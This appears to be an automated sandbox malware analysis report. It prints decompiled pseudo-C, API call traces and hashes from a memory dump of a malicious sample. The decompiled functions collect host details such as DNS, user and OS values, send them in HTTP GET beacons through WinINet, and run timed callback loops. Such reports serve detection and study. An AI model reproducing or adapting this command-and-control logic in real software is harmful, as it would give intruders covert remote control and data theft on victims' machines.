						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
						_t122 = _t122 + 0xc;
						_t114 = _t114 + _t96;
					}
					_t45 =  *0x5ea348; // 0x25dd5a8
					_t10 = _t45 + 0x5eb246; // 0x74636126
					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
					_t123 = _t122 + 0xc;
					_t115 = _t114 + _t48; // executed
					_t49 = E005E472F(_t99); // executed
					_t105 = _t49;
					if(_t105 != 0) {
						_t88 =  *0x5ea348; // 0x25dd5a8
						_t12 = _t88 + 0x5eb8d0; // 0x736e6426
						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t91;
						HeapFree( *0x5ea2d8, 0, _t105);
					}
					_t106 = E005E1340();
					if(_t106 != 0) {
						_t83 =  *0x5ea348; // 0x25dd5a8
						_t14 = _t83 + 0x5eb8c5; // 0x6f687726
						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t86;
						HeapFree( *0x5ea2d8, 0, _t106);
					}
					_t107 =  *0x5ea3cc; // 0x2bc9600
					_a20 = E005E6B59(0x5ea00a, _t107 + 4);
					_t53 =  *0x5ea36c; // 0x2bc95b0
					_t109 = 0;
					if(_t53 != 0) {
						_t80 =  *0x5ea348; // 0x25dd5a8
						_t17 = _t80 + 0x5eb8be; // 0x3d736f26
						wsprintfA(_t115 + _t98, _t17, _t53);
					}
					if(_a20 != _t109) {
						_t116 = RtlAllocateHeap( *0x5ea2d8, _t109, 0x800);
						if(_t116 != _t109) {
							E005E2915(GetTickCount());
							_t59 =  *0x5ea3cc; // 0x2bc9600
							__imp__(_t59 + 0x40);
							asm("lock xadd [eax], ecx");
							_t63 =  *0x5ea3cc; // 0x2bc9600
							__imp__(_t63 + 0x40);
							_t65 =  *0x5ea3cc; // 0x2bc9600
							_t66 = E005E6675(1, _t103, _t98,  *_t65); // executed
							_t119 = _t66;
							asm("lock xadd [eax], ecx");
							if(_t119 != _t109) {
								StrTrimA(_t119, 0x5e9280);
								_push(_t119);
								_t71 = E005E7563();
								_v20 = _t71;
								if(_t71 != _t109) {
									_t110 = __imp__;
									 *_t110(_t119, _v8);
									 *_t110(_t116, _v8);
									_t111 = __imp__;
									 *_t111(_t116, _v32);
									 *_t111(_t116, _t119);
									_t77 = E005E21A6(0xffffffffffffffff, _t116, _v28, _v24); // executed
									_v56 = _t77;
									if(_t77 != 0 && _t77 != 0x10d2) {
										E005E63F6();
									}
									HeapFree( *0x5ea2d8, 0, _v48);
									_t109 = 0;
								}
								HeapFree( *0x5ea2d8, _t109, _t119);
							}
							RtlFreeHeap( *0x5ea2d8, _t109, _t116); // executed
						}
						HeapFree( *0x5ea2d8, _t109, _a12);
					}
					RtlFreeHeap( *0x5ea2d8, _t109, _t98); // executed
				}
				return _v16;
			}


























































          0x005e3ce0
          0x005e3ce0
          0x005e3ce0
          0x005e3cf5
          0x005e3cf7
          0x005e3cfc
          0x005e3d00
          0x005e3d08
          0x005e3d0e
          0x005e3d12
          0x005e3d1a
          0x005e3d22
          0x005e3d22
          0x005e3d24
          0x005e3d30
          0x005e3d3f
          0x005e3d44
          0x005e3d47
          0x005e3d4c
          0x005e3d4f
          0x005e3d54
          0x005e3d57
          0x005e3d63
          0x005e3d70
          0x005e3d72
          0x005e3d78
          0x005e3d7d
          0x005e3d88
          0x005e3d8a
          0x005e3d8d
          0x005e3d93
          0x005e3d95
          0x005e3d9e
          0x005e3da9
          0x005e3dab
          0x005e3dae
          0x005e3dae
          0x005e3db0
          0x005e3db5
          0x005e3dc1
          0x005e3dc3
          0x005e3dc6
          0x005e3dc8
          0x005e3dcd
          0x005e3dd1
          0x005e3dd3
          0x005e3dd8
          0x005e3de4
          0x005e3de6
          0x005e3df2
          0x005e3df4
          0x005e3df4
          0x005e3dff
          0x005e3e03
          0x005e3e05
          0x005e3e0a
          0x005e3e16
          0x005e3e18
          0x005e3e24
          0x005e3e26
          0x005e3e26
          0x005e3e2c
          0x005e3e3f
          0x005e3e43
          0x005e3e48
          0x005e3e4c
          0x005e3e4f
          0x005e3e54
          0x005e3e5e
          0x005e3e60
          0x005e3e67
          0x005e3e7f
          0x005e3e83
          0x005e3e8f
          0x005e3e94
          0x005e3e9d
          0x005e3eae
          0x005e3eb2
          0x005e3ebb
          0x005e3ec1
          0x005e3ec9
          0x005e3ece
          0x005e3edb
          0x005e3ee1
          0x005e3eed
          0x005e3ef3
          0x005e3ef4
          0x005e3ef9
          0x005e3eff
          0x005e3f05
          0x005e3f0c
          0x005e3f13
          0x005e3f19
          0x005e3f20
          0x005e3f24
          0x005e3f2f
          0x005e3f34
          0x005e3f3a
          0x005e3f43
          0x005e3f43
          0x005e3f54
          0x005e3f5a
          0x005e3f5a
          0x005e3f64
          0x005e3f64
          0x005e3f72
          0x005e3f72
          0x005e3f83
          0x005e3f83
          0x005e3f91
          0x005e3f91
          0x005e3fa2

          APIs
          • RtlAllocateHeap.NTDLL ref: 005E3D08
          • GetTickCount.KERNEL32 ref: 005E3D1C
          • wsprintfA.USER32 ref: 005E3D6B
          • wsprintfA.USER32 ref: 005E3D88
          • wsprintfA.USER32 ref: 005E3DA9
          • wsprintfA.USER32 ref: 005E3DC1
          • wsprintfA.USER32 ref: 005E3DE4
          • HeapFree.KERNEL32(00000000,00000000), ref: 005E3DF4
          • wsprintfA.USER32 ref: 005E3E16
          • HeapFree.KERNEL32(00000000,00000000), ref: 005E3E26
          • wsprintfA.USER32 ref: 005E3E5E
          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 005E3E79
          • GetTickCount.KERNEL32 ref: 005E3E89
          • RtlEnterCriticalSection.NTDLL(02BC95C0), ref: 005E3E9D
          • RtlLeaveCriticalSection.NTDLL(02BC95C0), ref: 005E3EBB
            • Part of subcall function 005E6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66A0
            • Part of subcall function 005E6675: lstrlen.KERNEL32(00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66A8
            • Part of subcall function 005E6675: strcpy.NTDLL ref: 005E66BF
            • Part of subcall function 005E6675: lstrcat.KERNEL32(00000000,00000000), ref: 005E66CA
            • Part of subcall function 005E6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,005E3ECE,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66E7
          • StrTrimA.SHLWAPI(00000000,005E9280,00000000,02BC9600), ref: 005E3EED
            • Part of subcall function 005E7563: lstrlen.KERNEL32(02BC9C10,00000000,00000000,00000000,005E3EF9,00000000), ref: 005E7573
            • Part of subcall function 005E7563: lstrlen.KERNEL32(?), ref: 005E757B
            • Part of subcall function 005E7563: lstrcpy.KERNEL32(00000000,02BC9C10), ref: 005E758F
            • Part of subcall function 005E7563: lstrcat.KERNEL32(00000000,?), ref: 005E759A
          • lstrcpy.KERNEL32(00000000,?), ref: 005E3F0C
          • lstrcpy.KERNEL32(00000000,?), ref: 005E3F13
          • lstrcat.KERNEL32(00000000,?), ref: 005E3F20
          • lstrcat.KERNEL32(00000000,00000000), ref: 005E3F24
            • Part of subcall function 005E21A6: WaitForSingleObject.KERNEL32(00000000,747581D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E2258
          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 005E3F54
          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 005E3F64
          • RtlFreeHeap.NTDLL(00000000,00000000,00000000,02BC9600), ref: 005E3F72
          • HeapFree.KERNEL32(00000000,?), ref: 005E3F83
          • RtlFreeHeap.NTDLL(00000000,00000000), ref: 005E3F91
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
          • String ID: Uqt
          • API String ID: 186568778-2320327147
          • Opcode ID: eebf7b3feb615997b9bf7bb3ede2af964e28d61fc75f4ad62a57b6ce024ed834
          • Instruction ID: c6793bdd622b759b5052298eac6145466f63a21dd4c8749bc716e1a64e4fe3bf
          • Opcode Fuzzy Hash: eebf7b3feb615997b9bf7bb3ede2af964e28d61fc75f4ad62a57b6ce024ed834
          • Instruction Fuzzy Hash: 447190714002C5AFC719AB76DCCDE9B3BE8FB98700B050914F5C9DB231D631A909EB66
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E7B83 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 126networkstringCOMMON
          Download Yara Rule

          Control-flow Graph

          C-Code - Quality: 92%
          			E005E7B83(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E005E33DC(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E005E61DA(_t56);
					} else {
						E005E61DA( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E005E7B18) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E005E16B2( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x5ea348; // 0x25dd5a8
						_t15 = _t59 + 0x5eb845; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}














          0x005e7b83
          0x005e7b83
          0x005e7b8e
          0x005e7b95
          0x005e7b9d
          0x005e7ba7
          0x005e7bad
          0x005e7bc0
          0x005e7bd0
          0x005e7bc2
          0x005e7bc5
          0x005e7bca
          0x005e7bca
          0x005e7bc0
          0x005e7be0
          0x005e7be6
          0x005e7beb
          0x005e7cd4
          0x00000000
          0x005e7c06
          0x005e7c09
          0x005e7c1c
          0x005e7c22
          0x005e7c27
          0x005e7c4f
          0x005e7c62
          0x005e7c6c
          0x005e7c6f
          0x005e7c75
          0x005e7c7a
          0x00000000
          0x00000000
          0x005e7c7e
          0x005e7c8a
          0x005e7c9b
          0x005e7c9d
          0x005e7cae
          0x005e7cae
          0x005e7cbe
          0x00000000
          0x005e7cd0
          0x00000000
          0x005e7cd0
          0x00000000
          0x00000000
          0x00000000
          0x005e7c27

          APIs
          • lstrlen.KERNEL32(?,00000008,74714D40), ref: 005E7B95
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 005E7BB8
          • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 005E7BE0
          • InternetSetStatusCallback.WININET(00000000,005E7B18), ref: 005E7BF7
          • ResetEvent.KERNEL32(?), ref: 005E7C09
          • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 005E7C1C
          • GetLastError.KERNEL32 ref: 005E7C29
          • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 005E7C6F
          • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 005E7C8D
          • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 005E7CAE
          • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 005E7CBA
          • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 005E7CCA
          • GetLastError.KERNEL32 ref: 005E7CD4
            • Part of subcall function 005E61DA: RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
          • String ID: @MqtNqt
          • API String ID: 2290446683-2883916605
          • Opcode ID: dbd7201cc55d05684f07a4171be76362c491af0e9e6383b5164a981d90e8f82f
          • Instruction ID: c8635dc6388ff48917a460810c5921fbdb7079fc3f4f0b096507e17b9798d3f2
          • Opcode Fuzzy Hash: dbd7201cc55d05684f07a4171be76362c491af0e9e6383b5164a981d90e8f82f
          • Instruction Fuzzy Hash: DB419DB1500688BBD7399F72DC8DE5B7FBDFB98700F200918F686951A0E730AA05DB21
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E6815 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 151timememoryCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 147 5e6815-5e6847 memset CreateWaitableTimerA 148 5e684d-5e68a6 _allmul SetWaitableTimer WaitForMultipleObjects 147->148 149 5e69c8-5e69ce 147->149 150 5e68ac-5e68af 148->150 151 5e6930-5e6936 148->151 157 5e69d2-5e69dc 149->157 153 5e68ba 150->153 154 5e68b1 call 5e5251 150->154 155 5e6937-5e693b 151->155 156 5e68c4 153->156 163 5e68b6-5e68b8 154->163 159 5e693d-5e693f 155->159 160 5e694b-5e694f 155->160 162 5e68c8-5e68cd 156->162 159->160 160->155 161 5e6951-5e695b CloseHandle 160->161 161->157 164 5e68cf-5e68d6 162->164 165 5e68e0-5e690d call 5e35d2 162->165 163->153 163->156 164->165 166 5e68d8 164->166 169 5e690f-5e691a 165->169 170 5e695d-5e6962 165->170 166->165 169->162 173 5e691c-5e692c call 5e69e6 169->173 171 5e6964-5e696a 170->171 172 5e6981-5e6989 170->172 171->151 174 5e696c-5e697f call 5e63f6 171->174 175 5e698f-5e69bd _allmul SetWaitableTimer WaitForMultipleObjects 172->175 173->151 174->175 175->162 178 5e69c3 175->178 178->151
          C-Code - Quality: 83%
          			E005E6815(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x5ea2e0);
					_v76 = 0;
					_v80 = 0;
					L005E82DA();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x5ea30c; // 0x1b4
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x5ea2ec = 5;
						} else {
							_t69 = E005E5251(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x5ea300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E005E35D2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v124.HighPart = E005E69E6(_t75,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x5ea2e4);
							goto L21;
						} else {
							__eflags =  *0x5ea2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E005E63F6();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x5ea2e8);
								L21:
								L005E82DA();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x5ea2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}
































          0x005e6815
          0x005e682b
          0x005e682f
          0x005e6834
          0x005e683b
          0x005e6841
          0x005e6847
          0x005e69ce
          0x005e684d
          0x005e684d
          0x005e684f
          0x005e6854
          0x005e6855
          0x005e685b
          0x005e685f
          0x005e6863
          0x005e6871
          0x005e687f
          0x005e6883
          0x005e6885
          0x005e6892
          0x005e689e
          0x005e68a0
          0x005e68a6
          0x005e68af
          0x005e68ba
          0x005e68ba
          0x005e68b1
          0x005e68b1
          0x005e68b8
          0x00000000
          0x00000000
          0x005e68b8
          0x005e68c4
          0x00000000
          0x005e68c8
          0x005e68cd
          0x005e68d8
          0x005e68d8
          0x005e68e0
          0x005e68e6
          0x005e68ee
          0x005e68f7
          0x005e68fe
          0x005e6902
          0x005e6907
          0x005e690d
          0x00000000
          0x00000000
          0x005e690f
          0x005e6913
          0x005e691a
          0x00000000
          0x005e691c
          0x005e692c
          0x005e692c
          0x00000000
          0x005e695d
          0x005e695d
          0x005e6962
          0x005e6981
          0x005e6983
          0x005e6988
          0x005e6989
          0x00000000
          0x005e6964
          0x005e6964
          0x005e696a
          0x00000000
          0x005e696c
          0x005e696c
          0x005e6971
          0x005e6973
          0x005e6978
          0x005e6979
          0x005e698f
          0x005e698f
          0x005e6997
          0x005e69a5
          0x005e69a9
          0x005e69b5
          0x005e69b7
          0x005e69bb
          0x005e69bd
          0x00000000
          0x005e69c3
          0x00000000
          0x005e69c3
          0x005e69bd
          0x005e696a
          0x00000000
          0x005e6962
          0x005e6930
          0x005e6932
          0x005e6936
          0x005e6937
          0x005e6937
          0x005e693b
          0x005e6945
          0x005e6945
          0x005e694b
          0x005e694e
          0x005e694e
          0x005e6955
          0x005e6955
          0x005e69dc
          0x00000000

          APIs
          • memset.NTDLL ref: 005E682F
          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 005E683B
          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 005E6863
          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 005E6883
          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,005E26E9,?), ref: 005E689E
          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,005E26E9,?,00000000), ref: 005E6945
          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,005E26E9,?,00000000,?,?), ref: 005E6955
          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 005E698F
          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 005E69A9
          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 005E69B5
            • Part of subcall function 005E5251: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02BC9218,00000000,?,7476F710,00000000,7476F730), ref: 005E52A0
            • Part of subcall function 005E5251: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02BC9160,?,00000000,30314549,00000014,004F0053,02BC9270), ref: 005E533D
            • Part of subcall function 005E5251: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,005E68B6), ref: 005E534F
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,005E26E9,?,00000000,?,?), ref: 005E69C8
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
          • String ID: Uqt$@MqtNqt
          • API String ID: 3521023985-3266969629
          • Opcode ID: 696e31d450aab37b287cb21feb923ed8be8933a4b1a6ea4d779786d823fbfa4a
          • Instruction ID: 2e9c189897c84c9787a93719211dabcb074022a504d3285625eb539476054cd9
          • Opcode Fuzzy Hash: 696e31d450aab37b287cb21feb923ed8be8933a4b1a6ea4d779786d823fbfa4a
          • Instruction Fuzzy Hash: 48517E71408390AFC7159F228C889ABBFE8FB987A0F504A1AF5D5D6191D730D548DF92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E7FC5 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 209libraryCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 181 5e7fc5-5e802a 182 5e802c-5e8046 RaiseException 181->182 183 5e804b-5e8075 181->183 184 5e81fb-5e81ff 182->184 185 5e807a-5e8086 183->185 186 5e8077 183->186 187 5e8088-5e8093 185->187 188 5e8099-5e809b 185->188 186->185 187->188 196 5e81de-5e81e5 187->196 189 5e8143-5e814d 188->189 190 5e80a1-5e80a8 188->190 194 5e814f-5e8157 189->194 195 5e8159-5e815b 189->195 192 5e80aa-5e80b6 190->192 193 5e80b8-5e80c5 LoadLibraryA 190->193 192->193 197 5e8108-5e8114 InterlockedExchange 192->197 193->197 198 5e80c7-5e80d7 193->198 194->195 199 5e815d-5e8160 195->199 200 5e81d9-5e81dc 195->200 205 5e81f9 196->205 206 5e81e7-5e81f4 196->206 201 5e813c-5e813d FreeLibrary 197->201 202 5e8116-5e811a 197->202 214 5e80d9-5e80e5 198->214 215 5e80e7-5e8103 RaiseException 198->215 207 5e818e-5e819c GetProcAddress 199->207 208 5e8162-5e8165 199->208 200->196 201->189 202->189 210 5e811c-5e8128 LocalAlloc 202->210 205->184 206->205 207->200 209 5e819e-5e81ae 207->209 208->207 212 5e8167-5e8172 208->212 220 5e81ba-5e81bc 209->220 221 5e81b0-5e81b8 209->221 210->189 213 5e812a-5e813a 210->213 212->207 216 5e8174-5e817a 212->216 213->189 214->197 214->215 215->184 216->207 218 5e817c-5e817f 216->218 218->207 219 5e8181-5e818c 218->219 219->200 219->207 220->200 223 5e81be-5e81d6 RaiseException 220->223 221->220 223->200
          C-Code - Quality: 51%
          			E005E7FC5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x5e0000;
				_t115 = _t139[3] + 0x5e0000;
				_t131 = _t139[4] + 0x5e0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x5e0000;
				_v16 = _t139[5] + 0x5e0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x5e0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x5ea1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x5ea1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x5ea1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x5ea1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x5ea1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x5ea1b8; // 0x0
										 *_t102 = _t125;
										 *0x5ea1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x5ea1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
